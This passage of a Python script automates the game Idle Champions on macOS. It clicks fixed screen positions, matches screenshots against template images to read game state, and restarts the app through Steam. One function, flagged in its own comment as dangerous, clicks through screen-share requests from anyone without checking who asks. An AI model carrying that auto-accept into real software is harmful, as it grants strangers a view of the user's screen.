        verbose_print("%s: clicking on %d, %d" % (tag, x, y))
    if delay:
        time.sleep(delay)
def click_spec_at(x, y, duration=0.0, delay=DEFAULT_DELAY, tag=None):
    """Click a specialization choice: pause *delay*, then click the offset.

    Do not use this while modron auto-specialization is enabled.
    """
    time.sleep(delay)
    click_offset(x, y, duration=duration, delay=delay, tag=tag)
def region_for_screenshot(x, y, width, height):
    """Build a pyautogui screenshot region (physical pixels) from a
    window-relative rectangle expressed in screen points."""
    left, top = with_top_offset(x, y)
    return (screen_scale * left, screen_scale * top,
            screen_scale * width, screen_scale * height)
def location_for_screenshot(x, y):
    """Scale a point position to physical screenshot pixels."""
    return x * screen_scale, y * screen_scale
def safe_image_compare(im1, im2, save=False, max_mean=MAX_TOTAL_IMAGE_MEAN):
    """Fuzzy-compare two RGB images via mean channel difference.

    Matches when the summed per-channel mean difference does not exceed
    *max_mean* and no single channel mean exceeds MAX_IMAGE_MEAN.
    When *save* is True and the images differ, dumps debug PNGs.
    """
    diff = ImageChops.difference(im1, im2)
    stat = ImageStat.Stat(diff)
    verbose_print("mean=%s" % str(stat.mean))
    verbose_print("rms=%s" % str(stat.rms))
    red, green, blue = stat.mean[0], stat.mean[1], stat.mean[2]
    match = ((red + green + blue) <= max_mean
             and red <= MAX_IMAGE_MEAN
             and green <= MAX_IMAGE_MEAN
             and blue <= MAX_IMAGE_MEAN)
    if save and not match:
        im1.save("cmp-im1.png")
        im2.save("cmp-im2.png")
        diff.save("cmp-diff.png")
    return match
# Reference images of the in-game Menu button, pre-converted to RGB so they
# can be diffed against screenshots (used by check_for_menu below, which
# returns (found, ready): found = button at the expected place, ready = the
# active blue button rather than the greyed-out one behind an Okay dialog).
menu_blue_png = Image.open("images/menu_blue.png")
menu_blue = menu_blue_png.convert('RGB')
menu_blue2_png = Image.open("images/menu_blue.png")
# BUG FIX: previously converted menu_blue_png a second time, leaving
# menu_blue2_png unused. NOTE(review): the Image.open above probably should
# load "images/menu_blue2.png" -- confirm that asset exists before changing.
menu_blue2 = menu_blue2_png.convert('RGB')
menu_grey_png = Image.open("images/menu_grey.png")
menu_grey = menu_grey_png.convert('RGB')
def check_for_menu():
    """Screenshot the expected Menu-button area and classify it.

    Returns (found, ready): found is True when the menu button is at the
    expected place; ready is True when it is the active (blue) button
    rather than the greyed-out one shown behind a modal Okay dialog.
    """
    sx, sy = location_for_screenshot(*menu_location())
    region = (sx, sy, MENU_BUTTON_WIDTH, MENU_BUTTON_HEIGHT)
    grabbed = pyautogui.screenshot(region=region).convert('RGB')
    grabbed.save("testmenu.png")
    for reference, ready in ((menu_blue, True), (menu_blue2, True), (menu_grey, False)):
        if safe_image_compare(grabbed, reference):
            return True, ready
    return False, False
def hunt_for_menu(level_images):
    """Calibrate the window origin by scanning a 40x40 point area around the
    mouse for the blue Menu button, then confirming the guess by reading the
    current zone. Returns (top_x, top_y, True) on success, (0, 0, False)
    otherwise. Side effect: updates the module globals top_x/top_y.
    """
    global top_x, top_y
    pos = pyautogui.position()
    verbose_print("pos=%s" % str(pos))
    # x, y = location_for_screenshot(pos.x, pos.y)
    verbose_print("x,y=%d,%d" % (pos.x, pos.y))
    verbose_print("Configured top_x,top_y = %d,%d" % (top_x, top_y))
    # Search window: 20 points in each direction around the cursor, plus the
    # 30-point button image itself.
    off_x, off_y = 20, 20
    image_size = 30
    region = (screen_scale * (pos.x - off_x), screen_scale * (pos.y - off_y),
        screen_scale * (30+off_x), screen_scale * (30+off_y))
    verbose_print("region=%s" % str(region))
    im1 = pyautogui.screenshot(region=region)
    if verbose:
        im1.save("testmenu.png")
    im1 = im1.convert('RGB')
    found_x = 0
    found_y = 0
    # Slide a 30x30 crop across the captured region looking for the button.
    for i in range(0,off_x*2):
        for j in range(0,off_y*2):
            im2 = im1.crop((i, j, i+30, j+30))
            if safe_image_compare(im2, menu_blue):
                if verbose:
                    im2.save("testfoundmenu.png")
                verbose_print("found i,j=%d,%d" % (i, j))
                # adjust for actual center of the image
                x, y = (pos.x-off_x)*2 + i + image_size/2, (pos.y-off_y)*2 + j + image_size/2
                verbose_print("center x,y=%f,%f" % (x, y))
                # Convert pixel centre back to a window origin; the constants
                # mirror the 32,73 menu offset used by menu_location().
                x, y = x/screen_scale - 31 - 8, y/screen_scale - 75 - 5
                x = int(x)
                y = int(y)
                verbose_print("Guess: x,y=%f,%f == top_x,top_y=%d,%d " % (x, y, top_x, top_y))
                found_x = x
                found_y = y
                break
        if found_x:
            break
    if not found_x:
        return 0, 0, False
    # Jitter the guess by +/-1 point and accept the first origin from which
    # the zone bar can actually be read.
    for x_jitter in range(-1, 2, 1):
        for y_jitter in range(-1, 2, 1):
            top_x = found_x + x_jitter
            top_y = found_y + y_jitter
            verbose_print("trying jitter %d,%d => %d,%d" % (x_jitter, y_jitter, top_x, top_y))
            level, plus = get_current_zone(level_images=level_images, save=True, tries=1)
            if level > 0:
                print("Zone found %d (at start zone: %s), (on_boss: %s)" % (level, plus, on_boss()))
                return top_x, top_y, True
    return 0, 0, False
def activate_app(app_name, tries=2, reset_top=False):
    """Bring the window titled *app_name* to the foreground.

    Returns the active window object on success, False after *tries*
    failures. When reset_top is True, recalibrates the top_x/top_y globals
    from the activated window's frame.
    NOTE(review): relies on a module global ``top_offset`` defined elsewhere
    in this file -- confirm it is set before reset_top is used.
    """
    for c in range(0,tries):
        try:
            window = gw.getWindowsWithTitle(app_name)[0]
            window.activate()
            time.sleep(0.2)
            active = gw.getActiveWindow()
            if active.title == app_name:
                if reset_top:
                    global top_x, top_y, top_offset
                    top_x, top_y = active.left+1, active.top+top_offset
                    verbose_print("Updating top_x, top_y = %d,%d" % (top_x, top_y))
                return active
            if active.title == "":
                # active menu is a pull down or some crap ... move to a neutral corner
                pyautogui.moveTo(500,500)
            verbose_print("window title: %s try again" % gw.getActiveWindow().title)
        except gw.PyGetWindowException as a:
            # print("%s not found, starting at %s" % (APP_NAME, datetime.datetime.now()))
            verbose_print("WARNING: %s: %s" % (app_name, a, ))
        except Exception as a:
            # print("%s not found, starting at %s" % (APP_NAME, datetime.datetime.now()))
            verbose_print("WARNING: %s: %s" % (app_name, a, ))
    return False
# TODO: group/sort these according to target zone so we find zone quicker when at the end
def load_level_images():
    """Load every zone-number template under levels/ as a 60x56 RGB crop,
    keyed by file path."""
    templates = {}
    for path in glob.glob('levels/*.png'):
        debug_print(path)
        templates[path] = Image.open(path).convert('RGB').crop((0, 0, 60, 56))
    return templates
# Pixel offsets used by the legacy get_menu() conversion from located-image
# coordinates back to screen coordinates.
OFFSET_xx1 = 1829
OFFSET_Y = 14
# Dimensions of the zone-number template crops (see load_level_images).
IMAGE_WIDTH = 60
IMAGE_HEIGHT = 56
# TODO: LEGACY set top_x and top_x by finding menu
def get_menu(tries=10, update=False):
    """Legacy: locate the menu button image on screen and convert its
    position to screen pixels (the 1829/14 constants match OFFSET_xx1 and
    OFFSET_Y above). Returns (x, y) on success; returns None implicitly
    when all *tries* attempts fail. *update* is currently unused.
    """
    for i in range(0,tries):
        try:
            # menu_home = locate('menu.png', region=(0,0,400,400))
            menu_home = locate('menu_blue.png', 'menu_grey.png')
            x = menu_home.x * 2 + 1829
            y = menu_home.y * 2 + 14
            return x, y
        except Exception:
            # locate returned None (attribute error) or screenshot failed;
            # wait a beat and retry.
            time.sleep(1)
# TODO: make this work
def verify_menu(tries=10, update=False):
    """Confirm the menu button is where top_x/top_y say it is, or hunt for
    it on screen when the origin is uncalibrated.

    Returns True when the menu is confirmed; returns None implicitly when
    every attempt fails. *update* is currently unused.
    """
    menu_blue_nr = Image.open("menu_blue_nr.png")
    verbose_print("Verifying menu ...")
    for i in range(0,tries):
        # First check using existing top_x, top_y (if exists)
        if top_x != 0 or top_y != 0:
            found, ready = check_for_menu()
            verbose_print("Verifying menu found=%s,ready=%s" % (found, ready))
            if found or ready:
                return True
        else:
            # Image hunt!
            try:
                menu_home = locate('menu_blue.png', 'menu_grey.png')
                # x, y = location_for_screenshot(x, y)
                # x, y = menu_location()
                #
                # found ... all good!
                if menu_home:
                    print("menu_home=%s x,y=%d,%d" % (menu_home, menu_home.x, menu_home.y))
                    verbose_print("Verifying menu: locateAll with Image")
                    positions = pyautogui.locateAllOnScreen(menu_blue_nr)
                    if positions:
                        for pos in positions:
                            print("locateAll: x,y=%d,%d" % (pos.left, pos.top))
                    verbose_print("Verifying menu: locateAll with filename")
                    positions = pyautogui.locateAllOnScreen("./menu_blue_nr.png")
                    if positions:
                        for pos in positions:
                            print("locateAll: x,y=%d,%d" % (pos.left, pos.top))
                    verbose_print("Verifying menu: locate with filename")
                    return True
            except Exception as e:
                print("image hunt %s" % e)
def get_level_region():
    """Screenshot region (pixels) covering the first zone icon in the zone
    bar, nudged one pixel right and up from the raw 956,90 point rectangle."""
    base = region_for_screenshot(956, 90, 30, 28)
    return (base[0] + 1, base[1] - 1, base[2], base[3])
# Reference templates: the (dark) boss icon and the zone-complete marker,
# pre-converted to RGB for diffing in on_boss()/zone_complete().
boss = Image.open("levels/bosss.png").convert('RGB')
zone = Image.open("images/zone_complete.png").convert('RGB')
def on_boss(save_images=False, fast=True):
    """Return True when the current zone is a boss zone.

    Grabs the boss icon from the zone bar and fuzzy-compares it against the
    reference `boss` template (the icon is dark while fighting a boss).

    save_images: dump the grabbed icon, the reference, and their diff as
        PNGs for debugging.
    fast: temporarily disable pyautogui's per-call pause and fail-safe while
        grabbing, matching zone_complete(). BUG FIX: this flag used to be
        ignored -- the toggling was keyed off save_images, and FAILSAFE was
        unconditionally forced back to True even when it was never touched.
    """
    # grab boss icon, on boss if it is black
    region = region_for_screenshot(1154, 93, 22, 22)
    pause = pyautogui.PAUSE
    if fast:
        pyautogui.FAILSAFE = False
        pyautogui.PAUSE = 0.0
    im1 = pyautogui.screenshot(region=region).convert('RGB')
    if fast:
        pyautogui.PAUSE = pause
        pyautogui.FAILSAFE = True
    if save_images:
        im1.save("onboss.png")
        boss.save("theboss.png")
        ImageChops.difference(im1, boss).save("bossdiff.png")
    return safe_image_compare(im1, boss)
def zone_complete(save_images=False, fast=True):
    """Return True when the zone-complete marker is visible in the zone bar.

    save_images: dump the grabbed strip, the reference, and their diff.
    fast: temporarily disable pyautogui's per-call pause and fail-safe
          while grabbing.
    """
    region = region_for_screenshot(1154 + 75, 93 - 25, 5, 10)
    saved_pause = pyautogui.PAUSE
    if fast:
        pyautogui.FAILSAFE = False
        pyautogui.PAUSE = 0.0
    grabbed = pyautogui.screenshot(region=region).convert('RGB')
    if save_images:
        grabbed.save("zonetest.png")
        zone.save("zonefound.png")
    diff = ImageChops.difference(grabbed, zone)
    if save_images:
        diff.save("diffdiff.png")
    stat = ImageStat.Stat(diff)
    if fast:
        pyautogui.PAUSE = saved_pause
        pyautogui.FAILSAFE = True
    return (stat.mean[0] + stat.mean[1] + stat.mean[2]) < MAX_IMAGE_MEAN
# object to support finding images by index
class LevelFinder(object):
    # NOTE(review): these mutable class attributes are shadowed by instance
    # attributes in load_level_images()/__init__, so they only act as
    # defaults; consider removing them.
    levels = []
    images = {}
    black = None
    index = 0
    def load_level_images(self):
        """Load zone templates from levels/*.png into self.images keyed by
        the bare filename (no dir, no extension); boss images are skipped
        and the all-black template is kept separately in self.black."""
        self.levels = []
        self.images = {}
        for f in glob.glob('levels/*.png'):
            debug_print(f)
            # strip the "levels/" prefix and ".png" suffix
            key = f[7:][:-4]
            if key == "bosss" or key == "boss":
                continue
            if key == "black":
                self.black = Image.open(f).convert('RGB').crop((0, 0, 60, 56))
                continue
            self.images[key] = Image.open(f).convert('RGB').crop((0, 0, 60, 56))
            self.levels.append(key)
        self.total_images = len(self.levels)
        self.levels.sort()
        return self.images
    def __init__(self):
        self.index = 0
        self.total_images = 0
        self.load_level_images()
    def get_current_zone(self, save=False, tries=LEVEL_TRYS):
        """Screenshot the zone bar and match it against the templates.

        Returns (level, plus) where plus is True unless the key carries the
        's' (start-zone) suffix; (-1, False) when nothing matches within
        *tries*. Remembers the matched index so the next search starts near
        the previous zone.
        """
        im = None
        for i in range(0, tries):
            verbose_print("get_current_zone attempt %d" % i)
            region = get_level_region()
            raw_im = pyautogui.screenshot(region=region)
            im = raw_im.convert('RGB')
            # check if black first ...
            diff = ImageChops.difference(im, self.black)
            stat = ImageStat.Stat(diff)
            if (stat.mean[0] + stat.mean[1] + stat.mean[2]) < MAX_IMAGE_MEAN:
                time.sleep(.1)
                continue
            # start search at last index ...
            for idx in range(0, self.total_images):
                key = self.levels[(self.index + idx) % self.total_images]
                img = self.images[key]
                diff = ImageChops.difference(im, img)
                stat = ImageStat.Stat(diff)
                if (stat.mean[0] + stat.mean[1] + stat.mean[2]) < MAX_IMAGE_MEAN:
                    try:
                        # keys look like "NNN" or "NNNs" (start-zone variant)
                        level = int(key[:3])
                        plus = (key[-1:] != 's')
                        self.index = (self.index + idx) % self.total_images
                        if not plus:
                            self.index -= 1
                        # print("idx = %d" % idx)
                        return level, plus
                    except Exception:
                        break
            if save:
                im.save('my_screenshot%d.png' % i)
            time.sleep(.1)
        return -1, False
def get_current_zone(level_images, save=False, tries=LEVEL_TRYS):
    """Module-level variant of LevelFinder.get_current_zone: match the zone
    bar screenshot against *level_images* (keyed by file path, e.g.
    "levels/123s.png"). Returns (level, plus) or (-1, False).
    """
    im = None
    for i in range(0,tries):
        verbose_print("get_current_zone attempt %d" % i)
        region = get_level_region()
        raw_im = pyautogui.screenshot(region=region)
        im = raw_im.convert('RGB')
        for name, img in level_images.items():
            diff = ImageChops.difference(im, img)
            stat = ImageStat.Stat(diff)
            if (stat.mean[0] + stat.mean[1] + stat.mean[2]) < 20.0:
                # name[7:10] is the 3-digit zone number in "levels/NNN?.png"
                match = name[7:10]
                if match == "bla" or match == "bos":
                    break
                try:
                    level = int(name[7:10])
                    plus = (name[10:11] != 's')
                    return level, plus
                except Exception:
                    break
        if save:
            im.save('my_screenshot%d.png' % i)
        time.sleep(.1)
    return -1, False
def get_current_level(x, y, level_images, save=False):
    """Like get_current_zone but screenshots an explicit (x, y) pixel
    location instead of the computed zone-bar region.

    NOTE(review): here ``plus = (name[10:11] == 's')`` while
    get_current_zone uses ``!=`` -- the two return opposite meanings for
    the 's' suffix; confirm which one is intended.
    """
    im = None
    for i in range(0,LEVEL_TRYS):
        verbose_print("Current level attempt %d" % i)
        im = pyautogui.screenshot(region=(x, y, 60, 56))
        for name, img in level_images.items():
            diff = ImageChops.difference(im.convert('RGB'), img)
            stat = ImageStat.Stat(diff)
            if (stat.mean[0] + stat.mean[1] + stat.mean[2]) < MAX_IMAGE_MEAN:
                match = name[7:10]
                if match == "bla" or match == "bos":
                    break
                try:
                    level = int(name[7:10])
                    plus = (name[10:11] == 's')
                    return level, plus
                except Exception:
                    break
        if save:
            im.save('my_screenshot%d.png' % i)
        time.sleep(.1)
    return -1, False
def query_yes_no(question, default="yes"):
    """Ask a yes/no question via raw_input() and return their answer.

    "question" is a string that is presented to the user.
    "default" is the presumed answer if the user just hits <Enter>.
        It must be "yes" (the default), "no" or None (meaning
        an answer is required of the user).

    The "answer" return value is True for "yes" or False for "no".
    """
    valid = {"yes": True, "y": True, "ye": True,
             "no": False, "n": False}
    prompts = {None: " [y/n] ", "yes": " [Y/n] ", "no": " [y/N] "}
    try:
        prompt = prompts[default]
    except KeyError:
        raise ValueError("invalid default answer: '%s'" % default)
    while True:
        sys.stdout.write(question + prompt)
        choice = input().lower()
        if default is not None and choice == '':
            return valid[default]
        if choice in valid:
            return valid[choice]
        sys.stdout.write("Please respond with 'yes' or 'no' "
                         "(or 'y' or 'n').\n")
def load_player_json():
    """Parse the Steam webRequestLog and return the JSON blobs (as dicts)
    from every line mentioning "current_area"."""
    user_file = os.path.join(Path.home(),
                             "Library/Application Support/Steam/steamapps/common/IdleChampions",
                             "IdleDragonsMac.app/Contents/Resources/Data/StreamingAssets",
                             "downloaded_files/webRequestLog.txt")
    player_info = []
    with open(user_file, "r") as f:
        for line in f:
            if "current_area" in line:
                player_info.append(json.loads(line))
    return player_info
# repair a broken desktop shortcut
def repair_shortcut():
    """Repair the Steam desktop shortcut bundle for Idle Champions.

    Copies the .icns icon out of the installed app and a known-good
    Info.plist into the shortcut. Returns False when a required path is
    missing; None on success (callers ignore the return value).
    """
    # short cut destination
    idle_path = os.path.join(Path.home(), config.get("idler", "steam_app_path"))
    if not os.path.isdir(idle_path):
        # BUG FIX: these error prints passed the path as a second print()
        # argument, leaving the %s placeholder unexpanded.
        print("ERROR: app path is incorrect: %s" % idle_path)
        print("ERROR: check that Idle Champions is installed")
        return False
    short_cut = os.path.join(Path.home(), config.get("idler", "shortcut_path"))
    if not os.path.isdir(short_cut):
        print("ERROR: short cut path is missing: %s" % short_cut)
        print("ERROR: create the Idle Champions shortcut in Steam")
        return False
    # cp .icns file
    icns_source = os.path.join(idle_path, config.get("idler", "steam_icns"))
    icns_dest = os.path.join(short_cut, config.get("idler", "shortcut_icns"))
    verbose_print("copying %s to %s" % (icns_source, icns_dest))
    shutil.copy(icns_source, icns_dest)
    # cp info.plst
    info_source = "./documentation/Info.plist"
    info_dest = os.path.join(short_cut, "Contents/Info.plist")
    verbose_print("copying %s to %s" % (info_source, info_dest))
    shutil.copy(info_source, info_dest)
def dump_stats(args, player_stats):
    """Print Blacksmith/Bounty contract inventory summaries.

    player_stats: list of webRequestLog JSON blobs; the first one containing
        a "details" key supplies the buffs inventory.
    args: unused, kept for interface compatibility.
    """
    # buff_id -> inventory count; 31-34 are blacksmith tiny/small/medium/
    # large, 17-20 are bounty tiny/small/medium/large.
    counts = {"31": 0, "32": 0, "33": 0, "34": 0,
              "17": 0, "18": 0, "19": 0, "20": 0}
    # check which line it is in:
    buffs = None
    for stat_block in player_stats:
        if "details" in stat_block:
            buffs = stat_block["details"]["buffs"]
            break
    # ROBUSTNESS FIX: iterating a missing buffs block used to raise TypeError.
    if not buffs:
        print("No buff inventory found in player stats.")
        return
    for buff in buffs:
        if "buff_id" not in buff:
            continue
        buff_id = buff["buff_id"]
        if buff_id in counts:
            counts[buff_id] = int(buff["inventory_amount"])
    bs_tiny, bs_small, bs_medium, bs_large = (
        counts["31"], counts["32"], counts["33"], counts["34"])
    bc_tiny, bc_small, bc_medium, bc_large = (
        counts["17"], counts["18"], counts["19"], counts["20"])
    ilvls = bs_tiny * 1 + bs_small*2 + bs_medium * 6 + bs_large * 24
    print("Blacksmith Contracts: %d ilvls" % ilvls)
    print(" tiny=%d x 1 + small=%d x 2 + medium=%d x 6 + large=%d x 24 = %d ilvls" % (
        bs_tiny, bs_small, bs_medium, bs_large, ilvls,
    ))
    tokens = bc_tiny*12 + bc_small*72 + bc_medium * 576 + bc_large * 1152
    runs = tokens / 2500
    print("Bounty Contracts: %d tokens (%d free play runs)" % (tokens, runs))
    print(" tiny=%d x 12 + small=%d x 72 + medium=%d x 576 + large=%d x 1152 = %d tokens (%d runs)" % (
        bc_tiny, bc_small, bc_medium, bc_large, tokens, runs
    ))
# Dangerous, you will accept screenshare from whomever asks ...
# TODO: Need to add an image check for person intended.
def accept_screen_share(is_on):
    """When *is_on*, click through the screen-share accept dialog."""
    if not is_on:
        return
    # First click opens the request, second accepts it.
    for cx, cy, pause in ((1400, 50, 1.0), (924, 300, 0.0)):
        pyautogui.moveTo(cx, cy, duration=0.0)
        pyautogui.click()
        if pause:
            time.sleep(pause)
def locate(png_name, png_name2=None, click_image_index=0, search_region=None, can_swap=True, screen_shot=None):
    """Find a template image in a screenshot and return its centre as a
    pyautogui.Point in screen points (pixel coords halved), or None.

    Tries the current resolution prefix first; on failure swaps
    first_prefix/second_prefix (retina vs standard assets) and retries once,
    then falls back to *png_name2* if given.
    click_image_index: pick the Nth match via locateAll instead of the first.
    """
    verbose_print("locating %s" % str(png_name))
    global first_prefix, second_prefix
    if not screen_shot:
        screen_shot = pyautogui.screenshot(region=search_region)
        screen_shot.save("test"+png_name)
    # BUG FIX: x_off/y_off were only assigned when search_region was given,
    # so full-screen lookups always raised NameError (silently swallowed
    # below) and could never succeed.
    x_off = 0
    y_off = 0
    if search_region:
        x_off = search_region[0]
        y_off = search_region[1]
    try:
        if click_image_index > 0:
            # BUG FIX: the kwarg was misspelled "greyscale=0.9", which made
            # pyautogui.locateAll raise TypeError on every call; the correct
            # parameter name is "grayscale" (matching the branch below).
            positions = pyautogui.locateAll(first_prefix+png_name,
                                            screen_shot,
                                            grayscale=True,
                                            )
            positions = list(positions)
            box = positions[click_image_index]
            by2 = pyautogui.Point((x_off+box.left+(box.width/2)) / 2, (y_off+box.top+(box.height/2)) / 2)
        else:
            box = pyautogui.locate(first_prefix+png_name,
                                   screen_shot,
                                   grayscale=True,
                                   )
            by2 = pyautogui.Point((x_off+box.left+(box.width/2)) / 2, (y_off+box.top+(box.height/2)) / 2)
        verbose_print("locate(%s) = %s" % (png_name, str(by2)))
        return by2
    except Exception as e:
        verbose_print("locate(%s) = %s" % (png_name, str(e)))
        pass
    # only recurse once per image ...
    if not can_swap:
        if png_name2:
            return locate(png_name2,
                          click_image_index=click_image_index,
                          search_region=search_region,
                          can_swap=True,
                          screen_shot=screen_shot)
        return None
    # swap so we find the right resolution faster next time (won't swap if second also raises)
    verbose_print("swapping from %s to %s" % (first_prefix, second_prefix))
    t = first_prefix
    first_prefix = second_prefix
    second_prefix = t
    return locate(png_name,
                  png_name2=png_name2,
                  click_image_index=click_image_index,
                  search_region=search_region,
                  can_swap=False, screen_shot=screen_shot)
def drag_image(png_name, delta_x, delta_y, duration=DEFAULT_DRAG, delay=DEFAULT_DELAY):
    """Find *png_name* on screen and drag it by (delta_x, delta_y) points."""
    anchor = locate(png_name)
    pyautogui.moveTo(anchor.x, anchor.y)
    pyautogui.mouseDown(x=anchor.x, y=anchor.y, button=pyautogui.LEFT)
    pyautogui.dragRel(delta_x, delta_y, duration=duration,
                      button=pyautogui.LEFT, mouseDownUp=False)
    pyautogui.mouseUp(button=pyautogui.LEFT)
    time.sleep(delay)
    verbose_print("Location: %s" % str(anchor))
    return "Dragged {0}".format(png_name)
def goto_image(png_name, png_name2=None, delay=0.5):
    """Move (without clicking) to the first on-screen match of the image(s)."""
    return click_image(png_name, png_name2=png_name2, delay=delay, click=False)
def click_image(png_name, png_name2=None, delay=0.5, click=True, click_image_index=0):
    """Locate an image on screen, move to it, and (optionally) click it.

    Returns "" when not found, "Moved" when click is False, otherwise
    "Clicked <png_name>". The fallback *png_name2* is only tried when
    locating the primary image raises.
    """
    global verbose
    target = None
    try:
        target = locate(png_name, click_image_index=click_image_index)
    except Exception:
        if png_name2:
            try:
                target = locate(png_name2, click_image_index=click_image_index)
            except Exception:
                target = None
    if not target:
        return ""
    if verbose:
        print("Location: %s" % str(target))
    pyautogui.moveTo(target.x, target.y)
    time.sleep(delay)
    if not click:
        return "Moved"
    pyautogui.click()
    time.sleep(delay)
    return "Clicked {0}".format(png_name)
def check_crashed_app():
    """Detect the macOS crash-report dialog; if present, dismiss it, click
    through any Okay dialog, and relaunch the game. Returns False when no
    crash dialog exists."""
    try:
        crash_window = gw.getWindowsWithTitle("Problem Report for Idle Champions")[0]
    except Exception:
        return False
    print("Detected Crash!")
    crash_window.close()
    # click [OK]
    click_ok()
    startup_idle_champions()
def shutdown_app(keyboard=True):
    """Quit Idle Champions: try CMD-Q against the activated app first (when
    *keyboard*), then fall back to closing its window.

    Raises gw.PyGetWindowException when no exactly-matching window could be
    closed.
    """
    if keyboard:
        verbose_print("Shutdown Idle Champions with CMD-Q")
        try:
            app = activate_app(APP_NAME)
            if app:
                debug_print("App for CMD-q %s" % app.title)
                debug_print("Sending CMD-q")
                pyautogui.hotkey('command', 'q', interval=0.1)
                return
        except Exception as e:
            pass
    verbose_print("Shutdown Idle Champions with close")
    try:
        windows = gw.getWindowsWithTitle(APP_NAME)
        for window in windows:
            if window.title == APP_NAME:
                window.close()
                # give the app time to actually exit
                time.sleep(20.0)
                return
            # BUG FIX: this referenced the undefined name APP_name and would
            # raise NameError whenever a near-match window was found.
            print("Warning: shutdown: '%s' not an exact match for '%s'" % (window.title, APP_NAME))
        raise gw.PyGetWindowException("No exact match for 'Idle Champions'")
    except Exception as e:
        raise gw.PyGetWindowException("ERROR: shutdown: '%s'" % e)
# Startup using Steam App
# Warning: will shutdown app if running!
def startup_idle_champions(tries=5):
    """Launch Idle Champions via desktop shortcut, configured Steam Play
    button coordinates, or Steam image search, then wait for the window and
    click through startup dialogs. Returns True on success, False after
    *tries* full attempts (killing the app between attempts).
    """
    # TODO: loop on this block until we find menu.png if not using preset top_x, top_y
    # Bring up steam
    print("Restarting Idle Champions")
    for attempt in range(0,tries):
        if config.getboolean("idler", "shortcut_restarting"):
            verbose_print("Starting app with shortcut")
            try:
                short_cut = os.path.join(Path.home(), config.get("idler", "shortcut_path"))
                if not os.path.exists(short_cut):
                    print("ERROR: create a %s desktop short cut using Steam" % short_cut)
                    sys.exit(1)
                result = os.system("open '%s'" % short_cut)
                verbose_print("open shortcut_path (%s) returns %s" % (short_cut, str(result)))
            except Exception as e:
                print("ERROR: could not launch %s" % short_cut)
                print("ERROR: %s" % str(e))
                sys.exit(1)
        elif config.getboolean("idler", "shortcut_start_xy"):
            # TODO: fall back to click_image if this fails
            x = config.getint("steam", "start_x")
            y = config.getint("steam", "start_y")
            pyautogui.moveTo(x, y)
            time.sleep(0.1)
            pyautogui.click()
            time.sleep(1.0)
        else:
            verbose_print("Looking for the steam app")
            # move mouse to top corner
            steam = activate_app("Steam")
            # click [Play] or [Stop]
            verbose_print("Clicking Play/Stop")
            # NOTE: start_with_image is more finicky that start with x,y
            if config.getboolean("steam", "start_with_image"):
                click_image("steam_play.png")
        # now restore the app to front
        print("Waiting for Idle to launch.")
        found_app = False
        ignore_errors = 20
        # poll for up to ~20 seconds (40 half-second checks)
        for s in range(40, 0, -1):
            verbose_print(" %d seconds" % (s/2))
            time.sleep(0.5)
            # bring to front
            try:
                windows = gw.getWindowsWithTitle(APP_NAME)
                for window in windows:
                    if window.title == APP_NAME:
                        found_app = activate_app(APP_NAME, reset_top=True)
                    # NOTE(review): this raise is unconditional inside the
                    # loop, so it always fires after (at most) one window is
                    # checked; the found_app test below is what breaks out.
                    raise gw.PyGetWindowException("No exact match for 'Idle Champions'")
            except gw.PyGetWindowException as a:
                if s <= ignore_errors:
                    print("Not found yet: %s: %s" % (datetime.datetime.now(), a))
                else:
                    verbose_print("Not found yet: %s: %s" % (datetime.datetime.now(), a))
            except Exception as a:
                if s <= ignore_errors:
                    print("Not found yet: %s: %s" % (datetime.datetime.now(), a))
                else:
                    verbose_print("Not found yet: %s: %s" % (datetime.datetime.now(), a))
            if found_app:
                break
        # click ok or find menu for 20 seconds
        if click_ok(startup=True, count=20, ic_app=found_app):
            return True
        # Try killing the app and trying again
        shutdown_app(True)
    return False
def click_ok(count=1, startup=False, ic_app=None):
    """Dismiss startup Okay dialogs: madly click known Okay locations, then
    check the menu button; when the menu is found but still greyed out,
    fall back to hunting for the Okay image. Returns True when the menu is
    ready; otherwise False (or a coordinate pair from the legacy fallback).
    *startup* is currently unused.
    """
    # Look for an OK button
    found_ok = False
    move = 50
    # loop attempting a "smart" startup using remembered or hinted top_x, top_y
    known_okays = [(635, 505), (635, 475), (635, 565), (750, 370)]
    ready = False
    found_menu = False
    for s in range(count, 0, -1):
        if ready:
            return True
        # start by clicking on known OK locations to skip movies/okay seeking
        verbose_print(" Madly clicking on possible okay locations")
        for pair in known_okays:
            x, y = with_top_offset(pair[0], pair[1])
            pyautogui.moveTo(x, y, 0.1)
            pyautogui.click(x, y)
            time.sleep(0.1)
        # TODO: set top x, y if not using location hints
        # check for greyed our AND normal menu button, greyed out find okay, normal we're done!
        verbose_print(" Checking for menu button")
        found, ready = check_for_menu()
        if ready:
            return True
        if found_menu:
            # second check, now need to manually hunt for Okay button
            break
        found_menu = found
        if count != 0:
            try:
                if gw.getActiveWindow().title != APP_NAME:
                    raise Exception("wrong window")
            except Exception as e:
                ic_app = activate_app(APP_NAME)
                time.sleep(0.5)
        time.sleep(0.5)
        # NOTE(review): this return sits inside the loop body, so the loop
        # above only ever runs one iteration before giving up.
        return False
    # give up on fast method, now go looking for okay image and reset top_x, top_y using menu image
    # NOTE(review): this fallback references x, y (leftover from the loop
    # above) and an undefined name level_images; the resulting NameError is
    # swallowed by the bare except on every iteration.
    for s in range(count, 0, -1):
        try:
            found_level, plus = get_current_level(x, y, level_images, False)
            if found_level > 0:
                print(" Found %d level." % found_level)
                return x,y
        except Exception:
            pass
        if count > 0:
            time.sleep(1.0)
        try:
            x1, y1 = get_menu(1)
            # found! we can just leave now
            return x1, y1
        except Exception:
            pass
        if not found_ok:
            try:
                found_ok = click_image("okay.png")
                if found_ok:
                    time.sleep(2)
                    print(" Found okay button.")
            except Exception:
                pass
        # wiggle the cursor up and down in case it is covering the button
        pyautogui.moveRel(0, move)
        move = -move
        time.sleep(.8)
def foreground_or_start(tries=2):
    """Bring Idle Champions to the foreground, launching it when activation
    fails, and recalibrate the window origin via verify_menu() when
    top_x/top_y have never been set."""
    if not activate_app(APP_NAME, tries=tries, reset_top=True):
        startup_idle_champions()
    if top_x == 0 and top_y == 0:
        verify_menu()
def wrap_it_up():
    """Finish the current adventure by fixed coordinates: press Complete,
    mash the Skip button, then click Continue."""
    foreground_or_start()
    time.sleep(0.5)
    pyautogui.press("r")
    # wait for the completion animation before clicking
    time.sleep(0.9)
    click_offset(559, 491, duration=0.1, delay=0.1, tag="Click Complete")
    # hammer Skip for a while to get through the reward animations
    for _ in range(30):
        click_offset(1158, 650, duration=0.1, delay=0.1, tag="Click Skip")
        time.sleep(0.1)
    click_offset(635, 595, duration=0.1, delay=0.1, tag="Click Continue")
    time.sleep(5.5)
def wrap_it_up2(position):
